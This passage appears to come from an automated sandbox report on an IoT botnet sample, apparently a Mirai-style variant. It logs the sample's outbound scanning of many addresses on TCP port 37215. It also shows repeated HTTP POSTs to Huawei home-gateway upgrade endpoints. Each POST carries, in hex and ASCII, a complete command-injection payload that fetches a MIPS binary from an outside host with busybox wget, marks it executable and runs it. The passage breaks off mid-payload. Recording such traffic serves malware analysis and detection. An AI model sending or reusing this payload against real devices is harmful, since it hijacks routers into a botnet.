              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.109.75.236:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 157.220.254.171:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.76.90.100:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 197.12.194.96:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.187.160.147:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.93.12.94:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.128.103.160:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 197.23.100.14:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 197.203.5.207:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.25.98.162:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 157.227.187.233:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 23.213.180.16:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.159.244.230:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.85.174.136:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 91.37.93.226:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.138.35.143:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 36.11.106.126:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 41.215.245.248:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 94.66.98.14:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 157.22.22.222:37215
              Source: global trafficTCP traffic: 192.168.2.13:51176 -> 197.140.217.254:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 